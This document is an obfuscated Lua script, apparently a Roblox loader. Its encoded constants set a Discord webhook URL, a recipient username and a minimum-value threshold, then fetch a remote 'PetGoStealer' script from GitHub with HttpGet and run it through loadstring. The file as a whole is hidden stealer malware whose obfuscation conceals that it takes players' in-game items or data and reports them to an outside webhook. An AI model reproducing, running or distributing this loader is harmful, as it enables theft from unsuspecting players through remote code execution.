--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v91=0;local v92;while true do if (v91==0) then v92=v2(v0(v30,16));if v19 then local v121=v5(v92,v19);v19=nil;return v121;else return v92;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v93=(v31/((5 -(1 + 2))^(v32-((879 -(282 + 595)) -1))))%(((1640 -(1523 + 114)) -(1 + 0))^(((v33-1) -(v32-(2 -1))) + (620 -((790 -235) + 64)))) ;return v93-(v93%(932 -(857 + 74))) ;else local v94=2^(v32-(569 -(367 + 201))) ;return (((v31%(v94 + v94))>=v94) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=0;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==((1387 -(32 + 85)) -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=4 -3 ;end end end local function v22() local v36=0 + 0 ;local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * (1213 -(892 + 65))) + v37 ;end if (v36==(0 -(180 -(67 + 113)))) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v36=351 -(87 + 263) ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;return (v42 * (41190819 -24413603)) + (v41 * (48199 + 17337)) + (v40 * (1017 -761)) + v39 ;end local function v24() local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==((4 -3) + 0)) then v46=953 -(802 + 137 + 13) ;v47=(v20(v45,2 -1 ,83 -63 ) * ((3 -1)^((53 -29) + 8))) + v44 ;v43=999 -(915 + 82) ;end if (v43==(5 -3)) then v48=v20(v45,5 + 8 + 8 ,40 -9 );v49=((v20(v45,(2632 -(447 + 966)) -((2926 -1857) + 118) )==((1819 -(1703 + 114)) -1)) and  -(702 -(376 + 325))) or (1 -0) ;v43=1 + (5 -3) ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==(794 -(368 + 423))) then if (v48==((0 -0) -0)) then if (v47==(18 -(10 + 8))) then return v49 * (0 -0) ;else local v122=442 -((681 -265) + 26) ;while true do if (v122==(0 -(0 + 0))) then v48=1 + 0 ;v46=0 -0 ;break;end end end elseif (v48==(9691 -(6002 + 1642))) then return ((v47==(438 -(145 + 293))) and (v49 * ((431 -((1099 -(87 + 968)) + 386))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(2509 -(998 + 488)) ) * (v46 + (v47/((1915 -(1789 + 124))^(818 -(745 + 21))))) ;end end end local function v25(v50) local v51;if  not v50 then local v95=0 -0 ;while true do if (v95==(0 + (376 -(85 + 291)))) then v50=v23();if (v50==0) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;local v52={};for v68=15 -(9 + (1270 -(243 + 1022))) , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v96,v97,v98,v99,v100,v101,v102,v103,v104) local v105=(function() return 0;end)();local v96=(function() return;end)();local v97=(function() return;end)();while true do if (v105==(74 -(71 + 3))) then local v119=(function() return 0 + 0 ;end)();while true do if (v119==0) then v96=(function() return 0;end)();v97=(function() return nil;end)();v119=(function() return 2 -1 ;end)();end if (v119~=1) then else v105=(function() return 1;end)();break;end end end if (v105~=(1 -0)) then else local v120=(function() return 0;end)();while true do if (v120~=(241 -(187 + 54))) then else while true do if (v96~=(780 -(162 + 618))) then else v97=(function() return v98();end)();if (v99(v97, #"]", #"|")~=0) then else local v165=(function() return 0 + 0 ;end)();local v166=(function() return;end)();local v167=(function() return;end)();local v168=(function() return;end)();while true do if (v165==(2 + 1)) then if (v99(v167, #"xxx", #"xnx")~= #"}") then else v168[ #"0836"]=(function() return v102[v168[ #"asd1"]];end)();end v103[v104]=(function() return v168;end)();break;end if (v165==1) then local v187=(function() return 0;end)();while true do if (v187==(0 -0)) then v168=(function() return {v100(),v100(),nil,nil};end)();if (v166==0) then local v192=(function() return 0;end)();local v193=(function() return;end)();while true do if (v192==0) then v193=(function() return 0;end)();while true do if (v193~=(0 + 0)) then else v168[ #"xnx"]=(function() return v100();end)();v168[ #"0313"]=(function() return v100();end)();break;end end break;end end elseif (v166== #",") then v168[ #"gha"]=(function() return v101();end)();elseif (v166==(1638 -(1373 + 263))) then v168[ #"gha"]=(function() return v101() -(2^16) ;end)();elseif (v166== #"nil") then local v198=(function() return 1000 -(451 + 549) ;end)();local v199=(function() return;end)();while true do if (v198==0) then v199=(function() return 0 + 0 ;end)();while true do if (v199~=0) then else v168[ #"91("]=(function() return v101() -(2^16) ;end)();v168[ #"http"]=(function() return v100();end)();break;end end break;end end end v187=(function() return 1;end)();end if ((1 -0)~=v187) then else v165=(function() return 2 -0 ;end)();break;end end end if (v165==(1386 -(746 + 638))) then if (v99(v167, #"|", #"|")~= #"\\") then else v168[1 + 1 ]=(function() return v102[v168[2 -0 ]];end)();end if (v99(v167,343 -(218 + 123) ,2)== #"[") then v168[ #"19("]=(function() return v102[v168[ #"-19"]];end)();end v165=(function() return 1584 -(1535 + 46) ;end)();end if ((0 + 0)~=v165) then else local v188=(function() return 0 + 0 ;end)();while true do if (v188==0) then v166=(function() return v99(v97,562 -(306 + 254) , #"gha");end)();v167=(function() return v99(v97, #"asd1",1 + 5 );end)();v188=(function() return 1 -0 ;end)();end if ((1468 -(899 + 568))~=v188) then else v165=(function() return 1;end)();break;end end end end end break;end end return v96,v97,v98,v99,v100,v101,v102,v103,v104;end end end end end;end)();local v54=(function() return function(v106,v107,v108) local v109=(function() return 0 + 0 ;end)();local v110=(function() return;end)();while true do if (v109==0) then v110=(function() return 0;end)();while true do if ((0 -0)==v110) then local v124=(function() return 0;end)();while true do if (v124~=(603 -(268 + 335))) then else v106[v107-#"/" ]=(function() return v108();end)();return v106,v107,v108;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #":",v59 do local v71=(function() return 290 -(60 + 230) ;end)();local v72=(function() return;end)();local v73=(function() return;end)();local v74=(function() return;end)();while true do if (v71==1) then v74=(function() return nil;end)();while true do if (v72~=0) then else v73=(function() return v21();end)();v74=(function() return nil;end)();v72=(function() return 573 -(426 + 146) ;end)();end if (v72~=(1 + 0)) then else if (v73== #"<") then v74=(function() return v21()~=(1456 -(282 + 1174)) ;end)();elseif (v73==(813 -(569 + 242))) then v74=(function() return v24();end)();elseif (v73== #"nil") then v74=(function() return v25();end)();end v60[v70]=(function() return v74;end)();break;end end break;end if (v71~=(0 -0)) then else local v114=(function() return 0;end)();while true do if ((0 + 0)==v114) then v72=(function() return 1024 -(706 + 318) ;end)();v73=(function() return nil;end)();v114=(function() return 1;end)();end if (v114==(1252 -(721 + 530))) then v71=(function() return 1272 -(945 + 326) ;end)();break;end end end end end v58[ #"xnx"]=(function() return v21();end)();for v75= #"/",v23() do FlatIdent_C460,Descriptor,v21,v20,v22,v23,v60,v55,v75=(function() return v53(FlatIdent_C460,Descriptor,v21,v20,v22,v23,v60,v55,v75);end)();end for v76= #":",v23() do v56,v76,v28=(function() return v54(v56,v76,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[2 -(2 -1) ];local v66=v62[2 + 0 ];local v67=v62[703 -(271 + 429) ];return function(...) local v77=v65;local v78=v66;local v79=v67;local v80=v27;local v81=1 + 0 ;local v82= -(1501 -(1408 + 92));local v83={};local v84={...};local v85=v12("#",...) -(1289 -(993 + 295)) ;local v86={};local v87={};for v111=0 + 0 ,v85 do if (v111>=v79) then v83[v111-v79 ]=v84[v111 + 1 + 0 ];else v87[v111]=v84[v111 + (1172 -(418 + (1980 -(322 + 905)))) ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do v89=v77[v81];v90=v89[1 + 0 ];if (v90<=10) then if (v90<=((612 -(602 + 9)) + 3)) then if (v90<=(1 + 0)) then if ((v90>(0 + 0)) or (569>=1591)) then local v125=v89[531 -(406 + 123) ];local v126,v127=v80(v87[v125](v13(v87,v125 + (754 -(239 + 514)) ,v89[1772 -(1749 + 20) ])));v82=(v127 + v125) -(1 + 0) ;local v128=(2511 -(449 + 740)) -((2121 -(826 + 46)) + 73) ;for v145=v125,v82 do local v146=0 + 0 ;while true do if (v146==0) then v128=v128 + 1 + 0 ;v87[v145]=v126[v128];break;end end end else local v129=v89[1147 -(466 + 679) ];v87[v129]=v87[v129](v13(v87,v129 + (2 -1) ,v82));end elseif ((v90<=(5 -3)) or (4490<=89)) then local v131=0;local v132;local v133;while true do if (v131==(1900 -(106 + 1794))) then v132=v89[1 + 1 ];v133=v87[v89[734 -(476 + 255) ]];v131=948 -(245 + 702) ;end if (v131==(1 + 0)) then v87[v132 + (2 -1) ]=v133;v87[v132]=v133[v89[10 -6 ]];break;end end elseif ((v90==(117 -(4 + 110))) or (4983<1808)) then v87[v89[3 -1 ]]=v89[587 -(57 + 527) ];else v64[v89[1430 -(41 + 1386) ]]=v87[v89[2 -0 ]];end elseif (v90<=(110 -(17 + 86))) then if (v90<=(221 -(42 + 174))) then do return;end elseif (v90==6) then v87[v89[(6 -4) + 0 ]]=v89[6 -3 ]~=((0 + 0) -(1898 -(260 + 1638))) ;else v87[v89[168 -(122 + (484 -(382 + 58))) ]]=v64[v89[5 -2 ]];end elseif ((3829>3769) and (v90<=(26 -18))) then v87[v89[5 -3 ]]=v89[3 + 0 ];elseif (v90>(7 + 2)) then v81=v89[1978 -(1913 + 62) ];else v87[v89[2 + 0 ]]();end elseif (v90<=15) then if (v90<=(2 + 10)) then if (v90==11) then if ((1485<=2904) and (v87[v89[5 -(9 -6) ]]==v89[7 -3 ])) then v81=v81 + (1934 -(565 + 1368)) ;else v81=v89[(57 + 11) -(30 + (71 -36)) ];end else v87[v89[1663 -(1477 + (546 -362)) ]]();end elseif (v90<=(9 + 4)) then v87[v89[1259 -(1043 + 214) ]]=v64[v89[11 -(1213 -(902 + 303)) ]];elseif ((4269==4269) and (v90==(1226 -(323 + 889)))) then v81=v89[7 -(8 -4) ];else local v159=580 -(361 + 219) ;local v160;local v161;while true do if (v159==1) then v87[v160 + (305 -((587 -343) + 60)) ]=v161;v87[v160]=v161[v89[4 + 0 ]];break;end if (v159==(320 -(53 + 267))) then v160=v89[1 + 1 ];v161=v87[v89[1004 -(938 + 63) ]];v159=414 -(15 + 398) ;end end end elseif (v90<=(1000 -(18 + 964))) then if ((387<=2782) and (v90<=(60 -44))) then local v138=0 + 0 ;local v139;while true do if ((v138==(0 + 0 + 0)) or (1899<=917)) then v139=v89[852 -(20 + 830) ];v87[v139]=v87[v139](v13(v87,v139 + 1 + 0 ,v82));break;end end elseif (v90==(284 -(176 + 91))) then v87[v89[128 -((1806 -(1121 + 569)) + 10) ]]=v89[1 + 2 ]~=(738 -(542 + (410 -(22 + 192)))) ;else v64[v89[6 -3 ]]=v87[v89[(684 -(483 + 200)) + (1464 -(1404 + 59)) ]];end elseif (v90<=(10 + 9)) then local v140=v89[1 + 1 ];local v141,v142=v80(v87[v140](v13(v87,v140 + (2 -(2 -1)) ,v89[7 -(4 -0) ])));v82=(v142 + v140) -(1552 -(1126 + 425)) ;local v143=405 -(118 + 287) ;for v147=v140,v82 do local v148=(765 -(468 + 297)) -(562 -(334 + 228)) ;while true do if ((v148==(1121 -((397 -279) + 1003))) or (4312<=876)) then v143=v143 + (1 -0) ;v87[v147]=v141[v143];break;end end end elseif ((2232<=2596) and (v90>(58 -38))) then do return;end elseif (v87[v89[4 -2 ]]==v89[381 -(142 + 235) ]) then v81=v81 + (2 -1) + (0 -0) ;else v81=v89[5 -2 ];end v81=v81 + (4 -3) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3Q00028Q00026Q00F03F03073Q00776562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31323938332Q38392Q353936383034393230322F746477706B6D4B6933396C33653066754E5966305F4165446C5474357566412D555347654D6D3933493339555A55786131684E4D716B6E5F44457A56486B39715F624757030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378536372697074792F456B7330766133312F6D61696E2F506574476F537465616C657203083Q00557365726E616D6503093Q004B696E674B6F792Q6103073Q006D696E5F726170025Q0088C34000173Q0012083Q00013Q0026143Q000E0001000200040A3Q000E0001001208000100043Q002Q12000100033Q001207000100053Q001207000200063Q002002000200020007001208000400084Q0011000500014Q0013000200056Q00013Q00022Q000900010001000100040A3Q001600010026143Q00010001000100040A3Q000100010012080001000A3Q002Q12000100093Q0012080001000C3Q002Q120001000B3Q0012083Q00023Q00040A3Q000100012Q00153Q00017Q00",v9(),...);
